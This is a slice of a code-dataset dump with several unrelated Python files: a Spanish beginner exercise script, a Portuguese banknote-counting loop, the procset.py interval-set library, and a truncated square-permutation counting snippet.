(DOS) # añade la lista indicada a listaNumeros\n elif digito == '3' : # condicion , si es igual al valor indicado\n listaNumeros.append (TRES) # añade la lista indicada a listaNumeros\n elif digito == '4' : # condicion , si es igual al valor indicado\n listaNumeros.append (CUATRO) # añade la lista indicada a listaNumeros\n elif digito == '5' : # condicion , si es igual al valor indicado\n listaNumeros.append (CINCO) # añade la lista indicada a listaNumeros\n elif digito == '6' : # condicion , si es igual al valor indicado\n listaNumeros.append (SEIS) # añade la lista indicada a listaNumeros\n elif digito == '7' : # condicion , si es igual al valor indicado\n 
listaNumeros.append (SIETE) # añade la lista indicada a listaNumeros\n elif digito == '8' : # condicion , si es igual al valor indicado\n listaNumeros.append (OCHO) # añade la lista indicada a listaNumeros\n elif digito == '9' : # condicion , si es igual al valor indicado\n listaNumeros.append (NUEVE) # añade la lista indicada a listaNumeros\n numeroDigitos = range (len(listaNumeros)) # devuelve una lista de numeros con el numero de elementos de la lista -cero al penultimo elemento- \n for POSICION in range (7) : # iterador , bucle for in , pasa los elementos de la lista a ; POSICION -posicion de la lista-\n for columna in numeroDigitos : # iterador , bucle for in , pasa los elementos de la lista a ; columna -NUMERO-\n if numero [columna] == '0' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '0' # asigna el digito en formato cadena\n elif numero [columna] == '1' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '1' # asigna el digito en formato cadena \n elif numero [columna] == '2' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '2' # asigna el digito en formato cadena\n elif numero [columna] == '3' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '3' # asigna el digito en formato cadena\n elif numero [columna] == '4' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '4' # asigna el digito en formato cadena\n elif numero [columna] == '5' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '5' # asigna el digito en formato cadena\n elif numero [columna] == '6' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '6' # asigna el digito en formato cadena\n elif numero [columna] == '7' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '7' # asigna el digito en formato cadena\n elif numero [columna] == '8' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '8' # asigna el digito en formato cadena \n elif numero [columna] == '9' : # condicion , si coincide la posicion de la cadena con el digito indicado\n valorColumna = '9' # asigna el digito en formato cadena\n cambiarAsteriscos = '' # asigna una cadena vacia \n for DIGITO in listaNumeros [columna] [POSICION] : # iterador , bucle for in , pasa los elementos de la cadena a ; DIGITO\n if DIGITO == '*' : # condicion , si la subcadena es un asterisco\n if not cambiarAsteriscos : # condicion , si la cadena esta vacia\n cambiarAsteriscos = valorColumna # asigna el valor correspondiente -digito en formato cadena-\n continue # vuelve al siguiente elemento de la cadena\n else : # si la cadena NO esta vacia\n cambiarAsteriscos += valorColumna # añade el valor valor correspondiente -digito en formato cadena- a la cadena\n continue # vuelve al siguiente elemento de la cadena\n cambiarAsteriscos += DIGITO # añade el valor valor correspondiente -la subcadena de la cadena- a la cadena (no lo cambia al no ser un asterisco) \n if columna == 0 : # condicion , si es la primera columna -cadena- , asigna la cadena a la variable \n DIGITOS = cambiarAsteriscos + ' ' # asigna la nueva cadena modificada -los asteriscos cambiados por el digito correspondiente- mas el espacio en blanco \n if columna != 0 : # condicion , si no es la primera columna -cadena- las siguientes cadenas se añaden 
consecutivas\n DIGITOS += cambiarAsteriscos + ' ' # añade la nueva cadena modificada -los asteriscos cambiados por el digito correspondiente- mas el espacio en blanco \n print (DIGITOS) # presenta los elementos de las sublistas con las misma posicion en una sola linea -cadena-\n else : # cuando finalice el iterador \n print ('\\n') # salto de linea\n\nnumerosGrandes1 ('1015') # llama y ejecuta la funcion con el argumento indicado\n\nnumerosGrandes1 ('0123456789') # llama y ejecuta la funcion con el argumento indicado\n\ndef calcular () : # definicion de la funcion \n listaDEnumeros = [] # lista vacia , se añaden los numeros introducidos\n while True : # bucle while continuo\n entrada_Teclado = input ('introduzca un numero y pulse enter -salir solo enter- ') # espera entrada teclado\n if not entrada_Teclado : # condicion , si es una cadena vacia\n if not listaDEnumeros : # condicion , si la lista esta vacia\n print ('lista vacia', listaDEnumeros, '\\n') # presenta la cadena y su valor -lista vacia-\n break # interrumpe el bucle while\n listaOrdenada = sorted (listaDEnumeros) # ordena la lista\n suma = 0 # asigna valor int \n for x in listaDEnumeros : # iterador , bucle for in , pasa los elementos de la lista a ; x \n suma += x # suma el valor de x al valor actual de suma -suma todos los numeros de la lista-\n print ('numeros introducidos : ', listaDEnumeros, '\\n') # presenta la cadena y su valor -lista de numeros introducidos-\n print ('cantidad de numeros introducidos : {} , suma total numeros : {} , numero mas bajo : {} , numero mas alto : {} , media : {}\\n'.format (len(listaDEnumeros), suma, listaOrdenada[0],listaOrdenada[-1], suma / len(listaDEnumeros))) # presenta la cadena formateada y sus valores\n break # interrumpe el bucle while\n listaDEnumeros.append (int(entrada_Teclado)) # añade los numeros a la lista\n\n\ncalcular () # llama y ejecuta la funcion \n\ndef frasesAleatorias (numeroLineas=5) : # definicion de la funcion \n if numeroLineas > 10 : # condicion , si es mas del numero indicado\n numeroLineas = 10 # asigna el numero maximo \n articulos = ['el','la', 'los', 'ella', 'ellos', 'nosotros', 'vosotros', 'yo'] # asigna la lista de articulos\n sujetos = ['hombre', 'hombres', 'mujer', 'mujeres', 'niño', 'niños', 'perro', 'gato'] # asigna la lista de sujetos\n adverbios = ['tranquilo', 'nervioso', 'alto', 'bajo', 'delgado', 'grueso', 'joven', 'viejo'] # asigna la lista de adverbios\n verbos = ['correr', 'parar', 'subir', 'bajar', 'coger', 'dejar', 'hablar', 'callar', 'pensar', 'dormir'] # asigna la lista de verbos\n for bucle in range (numeroLineas) : # iterador , bucle for in , pasa los elementos de la lista a ; bucle -numero de lineas aleatorias-\n articulo = random.choice (articulos) # selecciona una de las cadenas de la lista indicada\n sujeto = random.choice (sujetos) # selecciona una de las cadenas de la lista indicada\n adverbio = random.choice (adverbios) # selecciona una de las cadenas de la lista indicada\n verbo = random.choice (verbos) # selecciona una de las cadenas de la lista indicada\n tipoFrase = random.randint (1, 2) # selecciona uno de los dos numeros\n if tipoFrase == 1 : # condicion , si el numero es el indicado\n print (articulo + ' ' + sujeto + ' ' + verbo + ' ' + adverbio) # presenta una frase completa\n else : # numero 2\n print (articulo + ' ' + sujeto + ' ' + verbo) # presenta una frase sin adverbio\n else : # cuando finalice el iterador\n print ('\\n') # salto de linea\n\nfrasesAleatorias () # llama y ejecuta la funcion sin 
argumento\n\nfrasesAleatorias (6) # llama y ejecuta la funcion con el argumento indicado\n\nfrasesAleatorias (8) # llama y ejecuta la funcion con el argumento indicado \n\nfrasesAleatorias (9) # llama y ejecuta la funcion con el argumento indicado \n\nfrasesAleatorias (10) # llama y ejecuta la funcion con el argumento indicado \n\nfrasesAleatorias (12) # llama y ejecuta la funcion con el argumento indicado \n\ndef calcular1 () : # definicion de la funcion \n listaDEnumeros = [] # lista vacia , se añaden los numeros introducidos\n while True : # bucle while continuo\n entrada_Teclado = input ('introduzca un numero y pulse enter -salir solo enter- ') # espera entrada teclado\n if not entrada_Teclado : # condicion , si es una cadena vacia\n if not listaDEnumeros : # condicion , si la lista esta vacia\n print ('lista vacia', listaDEnumeros, '\\n') # presenta la cadena y su valor -lista vacia-\n break # interrumpe el bucle while\n menor = None # asigna el numero menor\n mayor = None # asigna el numero mayor \n for bucle in range (len(listaDEnumeros)) : # iterador , bucle for in , pasa los elementos de la lista a ; bucle -numero de veces que ordena la lista-\n for posicion, numero in enumerate (listaDEnumeros) : # iterador , bucle for in , pasa los elementos de la lista a ; numero , enumerate () numera los elementos de la lista\n posicionSiguiente = posicion + 1 # posicion siguiente\n if posicionSiguiente == len (listaDEnumeros) : # condicion , si el valor es igual al numero de elementos de la lista\n break # interrumpe el bucle\n if numero > listaDEnumeros [posicionSiguiente] : # condicion , si el numero es mayor que el siguiente\n menor = listaDEnumeros [posicionSiguiente] # asigna el numero menor \n mayor = numero # asigna el numero mayor\n listaDEnumeros [posicion] = menor # asigna el valor menor a la posicion actual de la lista \n listaDEnumeros [posicionSiguiente] = mayor # asigna el valor mayor a la posicion siguiente de la lista\n suma = 0 # asigna valor int\n for x in listaDEnumeros : # iterador , bucle for in , pasa los elementos de la lista a ; x \n suma += x # suma el valor de x al valor actual de suma -suma todos los numeros de la lista-\n print ('numeros introducidos : ', listaDEnumeros, '\\n') # presenta la cadena y su valor -lista de numeros introducidos-\n if len (listaDEnumeros) % 2 == 0 : # condicion , si el numero de elementos es par\n izquierda = listaDEnumeros [ : int(len (listaDEnumeros) / 2)] # asigna la subcadena desde inicio a la posicion indicada -posicion par-\n derecha = listaDEnumeros [int(len (listaDEnumeros) / 2) : ] # asigna la subcadena desde la posicion indicada -posicion par- al final de la lista \n sumaIzquierda = 0 # asigna la suma total de la subcadena izquierda\n for sumaI in izquierda : # iterador , bucle for in , pasa los elementos de la lista a ; sumaI\n sumaIzquierda += sumaI # suma el valor indicado al valor actual\n sumaDerecha = 0 # asigna la suma total de la subcadena derecha\n for sumaD in derecha : # iterador , bucle for in , pasa los elementos de la lista a ; sumaD\n sumaDerecha += sumaD # suma el valor indicado al valor actual\n media = ((sumaIzquierda / len (izquierda)) + (sumaDerecha / len (derecha))) / 2 # asigna el resultado de las medias de las dos subcadenas\n else : # si el numero de elementos es inpar\n media = suma / len(listaDEnumeros) # asigna el valor medio del resultado\n print ('cantidad de numeros introducidos : {} , suma total numeros : {} , numero mas bajo : {} , numero mas alto : {} , media : {}\\n'.format 
(len(listaDEnumeros), suma, listaDEnumeros[0],listaDEnumeros[-1], media)) # presenta la cadena formateada y sus valores\n break # interrumpe el bucle while\n listaDEnumeros.append (int(entrada_Teclado)) # añade los numeros a la lista\n\ncalcular1 () # llama y ejecuta la funcion sin argumento\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jvpb/PYTHON3","sub_path":"CAPITULO1/capitulo1.py","file_name":"capitulo1.py","file_ext":"py","file_size_in_byte":44515,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10912786543","text":"# 100, 50, 20, 10, 5, 2, 1\r\nbanco = int(input(\"Valor sacar: \"))\r\n\r\nnota_100, nota_50, nota_20, nota_10, nota_5, nota_2, nota_1 = 0, 0, 0, 0, 0, 0, 0\r\n\r\nnotas = [0, 0, 0, 0, 0, 0, 0]\r\n\r\nwhile banco > 0:\r\n if banco % 100 == 0:\r\n notas[0] += 1\r\n banco -= 100\r\n\r\n elif banco % 50 == 0: \r\n notas[1] += 1\r\n banco -= 50\r\n\r\n elif banco % 20 == 0:\r\n notas[2] += 1\r\n banco -= 20\r\n\r\n elif banco % 10 == 0: \r\n notas[3] += 1\r\n banco -= 10\r\n\r\n elif banco % 5 == 0:\r\n notas[4] += 1\r\n banco -= 5\r\n \r\n elif banco % 2 == 0:\r\n notas[5] += 1\r\n banco -= 2\r\n \r\n elif banco % 1 == 0:\r\n notas[6] += 1\r\n banco -= 1\r\n\r\nprint(f\"Você pode sacar combinando {notas[0]} de 100 | {notas[1]} de 50 | {notas[2]} de 20 | {notas[3]} de 10 | {notas[4]} de 5 | {notas[5]} nota de 2 | {notas[6]} de 1\")\r\n","repo_name":"Gbrvi/UENF","sub_path":"PROG1/C/Banco/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"33729506493","text":"import operator as _operator\n\n\nclass ProcInt(tuple):\n \"\"\"A ProcInt is a closed interval of non-negative integers.\"\"\"\n\n __slots__ = ()\n\n __NEW_SENTINEL = object() # sentinel for optional sup\n\n def __new__(cls, inf, sup=__NEW_SENTINEL):\n \"\"\"Create new instance of ProcInt(inf, sup).\"\"\"\n if not isinstance(inf, int):\n raise TypeError('{}() argument inf must be int'.format(cls.__name__))\n if sup is cls.__NEW_SENTINEL:\n sup = inf\n if not isinstance(sup, int):\n raise TypeError('{}() argument sup must be int'.format(cls.__name__))\n if inf > sup:\n raise ValueError('Invalid interval bounds')\n if inf < 0:\n raise ValueError('Invalid negative bound(s)')\n return tuple.__new__(cls, (inf, sup))\n\n def __getnewargs__(self):\n return tuple(self)\n\n def __repr__(self):\n \"\"\"Return a nicely formatted representation string.\"\"\"\n return '{}(inf={!r}, sup={!r})'.format(type(self).__name__, *self)\n\n def __str__(self):\n return format(self)\n\n def __format__(self, format_spec):\n if len(format_spec) > 1:\n raise ValueError('Invalid format specifier')\n if self.inf == self.sup:\n return str(self.inf)\n insep = format_spec or '-'\n return insep.join(map(str, self))\n\n def __len__(self):\n return self.sup - self.inf + 1\n\n def __contains__(self, item):\n return self.inf <= item <= self.sup\n\n inf = property(_operator.itemgetter(0), doc='Alias for field number 0')\n\n sup = property(_operator.itemgetter(1), doc='Alias for field number 1')\n\n\nclass _Sentinel:\n \"\"\"Helper class whose instances are greater than any object.\"\"\"\n\n __slots__ = ()\n\n def __eq__(self, other):\n return self is other\n\n def __lt__(self, other):\n return False\n\n __le__ = __eq__\n\n def __gt__(self, other):\n return True\n\n __ge__ = __gt__\n\n\nclass ProcSet:\n \"\"\"\n Set of non-overlapping (i.e., disjoint) non-negative integer 
intervals.\n \"\"\"\n\n __slots__ = ('_itvs', )\n\n def __init__(self, *intervals):\n \"\"\"\n A ProcSet can be initialized with either nothing (empty set), any\n number of non-negative integer, any number of :class:`ProcInt`-compatible\n iterable (iterable of exactly two :class:`int`), any number of ProcSet,\n or any combination of such objects.\n\n The resulting ProcSet is the union of all the intervals passed to the\n constructor.\n There is no restriction on the domains of the intervals passed to the\n constructor: the domains may overlap.\n \"\"\"\n self._itvs = [] # list of disjoint intervals, in increasing order\n for new_itvs in map(self._as_itvs, intervals):\n self._itvs = list(self._merge(self._itvs, new_itvs, _operator.or_))\n\n @classmethod\n def from_str(cls, string, insep=\"-\", outsep=\" \"):\n \"\"\"\n Build a ProcSet from a string representation of an interval set.\n The parsed string need not to be in canonical form.\n\n :param str string: \\\n string representation to parse\n :param str insep: \\\n delimiter character between the boundaries of a single interval\n (defaults to ``-``, ascii dash symbol ``0x2d``)\n :param str outsep: \\\n delimiter character between two intervals\n (defaults to ``␣``, ascii space symbol ``0x20``)\n \"\"\"\n if not isinstance(string, str):\n raise TypeError(\n 'from_str() argument 2 must be str, not {}'.format(type(string).__name__)\n )\n\n # empty string is parsed as empty ProcSet\n if not string:\n return cls()\n\n try:\n raw_bounds = (\n map(int, itv.split(sep=insep, maxsplit=1))\n for itv in string.split(sep=outsep)\n )\n intervals = (ProcInt(*bounds) for bounds in raw_bounds)\n return cls(*intervals)\n except ValueError:\n raise ValueError(\n 'Invalid interval format, parsed string is: \\'{}\\''.format(string)\n ) from None\n\n def __str__(self):\n return format(self)\n\n def __format__(self, format_spec):\n if format_spec:\n try:\n insep, outsep = format_spec\n except ValueError:\n raise ValueError('Invalid format specifier') from None\n else:\n insep, outsep = '- '\n\n return outsep.join(format(itv, insep) for itv in self._itvs)\n\n def __repr__(self):\n compact = lambda itv: str(tuple(itv)) if len(itv) > 1 else str(itv.inf)\n args = (compact(itv) for itv in self._itvs)\n return '{}({})'.format(type(self).__name__, ', '.join(args))\n\n def __iter__(self):\n \"\"\"Iterate over the processors in the ProcSet by increasing order.\"\"\"\n # as self._itvs is sorted by increasing order, we can directly yield\n for itv in self._itvs:\n yield from range(itv.inf, itv.sup + 1)\n\n def __reversed__(self):\n \"\"\"Iterate over the processors in the ProcSet by decreasing order.\"\"\"\n # as self._itvs is sorted in increasing order, we yield from the\n # reversed iterator\n for itv in reversed(self._itvs):\n yield from reversed(range(itv.inf, itv.sup + 1))\n\n def iter_slice(self, start=None, stop=None, step=None):\n \"\"\"\n Iterate over the processors in the ProcSet from *start* (included) to\n *stop* (excluded) by steps of *step*.\n \"\"\"\n cur, stop, step = slice(start, stop, step).indices(len(self))\n if step > 0:\n for itv in self._itvs:\n if stop <= cur: # early termination: no more matching items\n break\n while cur < len(itv) and cur < stop: # exhaust current itv\n yield itv.inf + cur\n cur += step\n # switch to new itv\n cur -= len(itv)\n stop -= len(itv)\n else:\n # work from end when step is negative\n cur -= len(self)\n stop -= len(self)\n for itv in reversed(self._itvs):\n if stop >= cur: # early termination: no more matching items\n 
break\n # account for current itv shift\n cur += len(itv)\n stop += len(itv)\n while cur >= 0 and cur > stop: # exhaust current itv\n yield itv.inf + cur\n cur += step # step is negative\n\n def __contains__(self, item):\n \"\"\"Check if item is in the ProcSet.\"\"\"\n if self._itvs:\n low, high = 0, len(self._itvs)\n while low < high:\n mid = (low + high) // 2\n if item in self._itvs[mid]:\n return True\n elif item < self._itvs[mid].inf:\n high = mid\n else:\n low = mid + 1\n return False\n\n def __eq__(self, other):\n # pylint: disable=protected-access\n return self._itvs == other._itvs\n\n def __bool__(self):\n return bool(self._itvs)\n\n def __len__(self):\n \"\"\"Return the number of processors contained in the ProcSet.\"\"\"\n return sum(len(itv) for itv in self._itvs)\n\n def count(self):\n \"\"\"Return the number of disjoint intervals in the ProcSet.\"\"\"\n return len(self._itvs)\n\n def iscontiguous(self):\n \"\"\"Return ``True`` if the ProcSet is made of a unique interval.\"\"\"\n return self.count() <= 1\n\n def isdisjoint(self, other):\n \"\"\"\n Return ``True`` if the ProcSet has no processor in common with *other*.\n \"\"\"\n if not isinstance(other, type(self)):\n try:\n other = type(self)(*other)\n except TypeError:\n return NotImplemented\n\n # A naive implementation would test the truthiness of the intersection\n # set. However, one does not care about the intersection set. It is\n # sufficient to test if the generator returned by _merge is empty.\n _sentinel = object()\n # pylint: disable=protected-access\n _first = next(self._merge(self._itvs, other._itvs, _operator.and_), _sentinel)\n return _first is _sentinel\n\n def _issubset(self, other):\n return self & other == self\n\n def issubset(self, other):\n \"\"\"Test whether every element in the ProcSet is in *other*.\"\"\"\n if not isinstance(other, type(self)):\n try:\n other = type(self)(*other)\n except TypeError:\n return NotImplemented\n return self._issubset(other)\n\n def __le__(self, other):\n \"\"\"Test whether every element in the ProcSet is in *other*.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n return self._issubset(other)\n\n def __lt__(self, other):\n \"\"\"\n Test whether the ProcSet is a proper subset of *other*, that is\n ``self <= other`` and ``self != other``.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n return self._issubset(other) and self != other\n\n def issuperset(self, other):\n \"\"\"Test whether every element in *other* is in the ProcSet.\"\"\"\n if not isinstance(other, type(self)):\n try:\n other = type(self)(*other)\n except TypeError:\n return NotImplemented\n # pylint: disable=protected-access\n return other._issubset(self)\n\n def __ge__(self, other):\n \"\"\"Test whether every element in *other* is in the ProcSet.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n # pylint: disable=protected-access\n return other._issubset(self)\n\n def __gt__(self, other):\n \"\"\"\n Test whether the ProcSet is a proper superset of *other*, that is\n ``self >= other`` and ``self != other``.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n # pylint: disable=protected-access\n return other._issubset(self) and self != other\n\n @staticmethod\n def _flatten(itvs):\n \"\"\"Generate the (flat) list of interval bounds contained in itvs.\"\"\"\n for itv in itvs:\n # use inf as is\n yield False, itv.inf\n # convert sup, as merging operations are made with half-open\n # intervals\n yield True, itv.sup + 
1\n\n @classmethod\n def _merge_core(cls, left_itvs, right_itvs, keeppredicate):\n \"\"\"\n Generate the (flat) list of interval bounds of the requested merge.\n\n The implementation is inspired by https://stackoverflow.com/a/20062829.\n \"\"\"\n endbound = False\n sentinel = _Sentinel()\n\n # pylint: disable=protected-access\n lflat = cls._flatten(left_itvs)\n rflat = cls._flatten(right_itvs)\n lend, lhead = next(lflat, (False, sentinel))\n rend, rhead = next(rflat, (False, sentinel))\n\n head = min(lhead, rhead)\n while head < sentinel:\n inleft = (head < lhead) == lend\n inright = (head < rhead) == rend\n keep = keeppredicate(inleft, inright)\n\n if keep ^ endbound:\n endbound = not endbound\n yield head\n if head == lhead:\n lend, lhead = next(lflat, (False, sentinel))\n if head == rhead:\n rend, rhead = next(rflat, (False, sentinel))\n\n head = min(lhead, rhead)\n\n @classmethod\n def _merge(cls, left_itvs, right_itvs, keeppredicate):\n \"\"\"\n Generate the ProcInt list of the requested merge.\n\n The returned iterator is supposed to be assigned to the _itvs attribute\n of the result ProcSet.\n See the difference(), intersection(), symmetric_difference(), and\n union() methods for an usage example.\n \"\"\"\n flat_merge = cls._merge_core(left_itvs, right_itvs, keeppredicate)\n\n # Note that we are feeding the same iterable twice to zip.\n # The iterated bounds are hence grouped by pairs (lower and upper\n # bounds of the intervals).\n # As zip() stops on the shortest iterable, it won't consider the\n # optional terminating sentinel (the sentinel would be the last\n # element, and would have an odd index).\n for inf, sup in zip(flat_merge, flat_merge):\n yield ProcInt(inf, sup - 1) # convert back to closed intervals\n\n def union(self, *others):\n \"\"\"Return a new ProcSet with elements from the ProcSet and all others.\"\"\"\n result = self.copy()\n for other in map(self._as_itvs, others):\n # pylint: disable=protected-access\n result._itvs = list(result._merge(result._itvs, other, _operator.or_))\n return result\n\n def __or__(self, other):\n \"\"\"Return a new ProcSet with elements from the ProcSet and *other*.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # We directly assign result._itvs as self._merge(…) returns a valid\n # _itvs list. This is the same as ProcSet(*self._merge(…)), minus the\n # input validation step.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(self._merge(self._itvs, other._itvs, _operator.or_))\n return result\n\n def intersection(self, *others):\n \"\"\"\n Return a new ProcSet with elements common to the ProcSet and all\n others.\n \"\"\"\n result = self.copy()\n for other in map(self._as_itvs, others):\n # pylint: disable=protected-access\n result._itvs = list(result._merge(result._itvs, other, _operator.and_))\n return result\n\n def __and__(self, other):\n \"\"\"\n Return a new ProcSet with elements common to the ProcSet and *other*.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # We directly assign result._itvs as self._merge(…) returns a valid\n # _itvs list. 
This is the same as ProcSet(*self._merge(…)), minus the\n # input validation step.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(self._merge(self._itvs, other._itvs, _operator.and_))\n return result\n\n @staticmethod\n def _difference_operator(inleft, inright):\n return inleft and not inright\n\n def difference(self, *others):\n \"\"\"\n Return a new ProcSet with elements in the ProcSet that are not in the\n others.\n \"\"\"\n result = self.copy()\n for other in map(self._as_itvs, others):\n # pylint: disable=protected-access\n result._itvs = list(result._merge(result._itvs, other, self._difference_operator))\n return result\n\n def __sub__(self, other):\n \"\"\"\n Return a new ProcSet with elements in the ProcSet that are not in *other*.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # We directly assign result._itvs as self._merge(…) returns a valid\n # _itvs list. This is the same as ProcSet(*self._merge(…)), minus the\n # input validation step.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(\n self._merge(self._itvs, other._itvs, self._difference_operator)\n )\n return result\n\n def symmetric_difference(self, other):\n \"\"\"\n Return a new ProcSet with elements in either the ProcSet or *other*,\n but not in both.\n \"\"\"\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(result._merge(self._itvs, self._as_itvs(other), _operator.xor))\n return result\n\n def __xor__(self, other):\n \"\"\"\n Return a new ProcSet with elements in either the ProcSet or *other*,\n but not in both.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # We directly assign result._itvs as self._merge(…) returns a valid\n # _itvs list. This is the same as ProcSet(*self._merge(…)), minus the\n # input validation step.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(self._merge(self._itvs, other._itvs, _operator.xor))\n return result\n\n def copy(self):\n \"\"\"Return a new ProcSet with a shallow copy of the ProcSet.\"\"\"\n # We directly assign result._itvs as self._itvs is a valid list. Note\n # that a ProcSet is nothing more than a container with some extra\n # methods, and a given structure. As the current implementation relies\n # on the _itvs list, copying a ProcSet is the same as copying the _itvs\n # list. Hence, we need to ensure a new _itvs list is created (and not\n # just a reference to self._itvs). 
As _itvs is a list of ProcInt, a\n # shallow copy is the same as a deep copy.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = self._itvs.copy()\n return result\n\n __copy__ = copy # ensure compatibility with standard module copy\n\n def __deepcopy__(self, memo):\n # Optimized version of __deepcopy__ for ProcSet.\n # /!\\ This optimization is implementation specific /!\\\n # The classic __deepcopy__ implementation can be bypassed because a\n # ProcInt is an immutable structure: there is no need to use the\n # generic and complex implementation of deepcopy for tuples that may\n # contain mutables.\n return self.copy()\n\n def update(self, *others):\n \"\"\"Update the ProcSet, adding elements from all others.\"\"\"\n for other in map(self._as_itvs, others):\n self._itvs = list(self._merge(self._itvs, other, _operator.or_))\n return self\n\n insert = update # backward compatibility alias\n\n def __ior__(self, other):\n \"\"\"Update the ProcSet, adding elements from *other*.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # pylint: disable=protected-access\n self._itvs = list(self._merge(self._itvs, other._itvs, _operator.or_))\n return self\n\n def intersection_update(self, *others):\n \"\"\"\n Update the ProcSet, keeping only elements found in the ProcSet and all\n others.\n \"\"\"\n for other in map(self._as_itvs, others):\n self._itvs = list(self._merge(self._itvs, other, _operator.and_))\n return self\n\n def __iand__(self, other):\n \"\"\"\n Update the ProcSet, keeping only elements found in the ProcSet and *other*.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # pylint: disable=protected-access\n self._itvs = list(self._merge(self._itvs, other._itvs, _operator.and_))\n return self\n\n def difference_update(self, *others):\n \"\"\"Update the ProcSet, removing elements found in others.\"\"\"\n for other in map(self._as_itvs, others):\n self._itvs = list(self._merge(self._itvs, other, self._difference_operator))\n return self\n\n discard = difference_update # convenience alias\n\n def __isub__(self, other):\n \"\"\"Update the ProcSet, removing elements found in *other*.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # pylint: disable=protected-access\n self._itvs = list(self._merge(self._itvs, other._itvs, self._difference_operator))\n return self\n\n def symmetric_difference_update(self, other):\n \"\"\"\n Update the ProcSet, keeping only elements found in either the ProcSet\n or *other*, but not in both.\n \"\"\"\n self._itvs = list(self._merge(self._itvs, self._as_itvs(other), _operator.xor))\n return self\n\n def __ixor__(self, other):\n \"\"\"\n Update the ProcSet, keeping only elements found in either the ProcSet\n or *other*, but not in both.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # pylint: disable=protected-access\n self._itvs = list(self._merge(self._itvs, other._itvs, _operator.xor))\n return self\n\n def clear(self):\n \"\"\"Empty the ProcSet, removing all elements from it.\"\"\"\n self._itvs = []\n\n def __getitem_int(self, index):\n assert isinstance(index, int)\n cur = index\n if cur >= 0:\n for itv in self._itvs:\n if cur < len(itv):\n return itv.inf + cur\n cur -= len(itv)\n else:\n for itv in reversed(self._itvs):\n if cur >= -len(itv):\n return itv.sup + 1 + cur\n cur += len(itv)\n raise IndexError('{} index out of range'.format(type(self).__name__))\n\n def __getitem__(self, index):\n if isinstance(index, int):\n return 
self.__getitem_int(index)\n if isinstance(index, slice):\n return list(self.iter_slice(index.start, index.stop, index.step))\n raise TypeError(\n '{} indices must be integers or slices, not {}'.format(\n type(self).__name__,\n type(index).__name__\n )\n )\n\n __setitem__ = None # it makes no sense to 'modify' a processor\n\n def __delitem__(self, index):\n raise NotImplementedError\n\n def aggregate(self):\n \"\"\"\n Return a new ProcSet that is the convex hull of the ProcSet.\n\n The convex hull of an empty ProcSet is the empty ProcSet.\n\n The convex hull of a non-empty ProcSet is the contiguous ProcSet made\n of the smallest unique interval containing all intervals from the\n non-empty ProcSet.\n \"\"\"\n if self._itvs:\n return type(self)(ProcInt(self.min, self.max))\n return type(self)()\n\n def intervals(self):\n \"\"\"\n Return an iterator over the intervals of the ProcSet in increasing order.\n \"\"\"\n return iter(self._itvs)\n\n @property\n def min(self):\n \"\"\"The first processor in the ProcSet (in increasing order).\"\"\"\n try:\n return self._itvs[0].inf\n except IndexError:\n raise ValueError('Empty ProcSet') from None\n\n @property\n def max(self):\n \"\"\"The last processor in the ProcSet (in increasing order).\"\"\"\n try:\n return self._itvs[-1].sup\n except IndexError:\n raise ValueError('Empty ProcSet') from None\n\n @staticmethod\n def _as_procint(elem):\n \"\"\"Yield elem as a ProcInt.\"\"\"\n try: # ProcInt-compatible (iterable of exactly 2 int)\n inf, sup = elem\n except ValueError:\n raise TypeError(\n 'Incompatible iterable, expected an iterable of exactly 2 int'\n ) from None\n except TypeError: # single point (non-negative int)\n inf, sup = elem, elem\n\n yield ProcInt(inf, sup)\n\n @classmethod\n def _as_itvs(cls, other):\n \"\"\"Iterate over other as an _itvs list.\"\"\"\n if isinstance(other, cls):\n # pylint: disable=protected-access\n yield from other._itvs\n else:\n yield from cls._as_procint(other)\n","repo_name":"oar-team/procset.py","sub_path":"src/procset.py","file_name":"procset.py","file_ext":"py","file_size_in_byte":23527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34112691548","text":"from math import ceil, floor, sqrt\n\n\ndef get_counter(s):\n cnt = [0] * 10\n for ss in s:\n cnt[int(ss)] += 1\n return cnt\n\n\nN = int(input())\nS = input()\nmi, ma = int(\"\".join(sorted(list(S)))), int(\"\".join(sorted(list(S), reverse=True)))\ncounter = get_counter(S)\nans = 0\nfor i in range(floor(sqrt(mi)), ceil(sqrt(ma)) + 1):\n s = str(pow(i, 2)).rjust(N, \"0\")\n if counter == get_counter(s):\n ans += 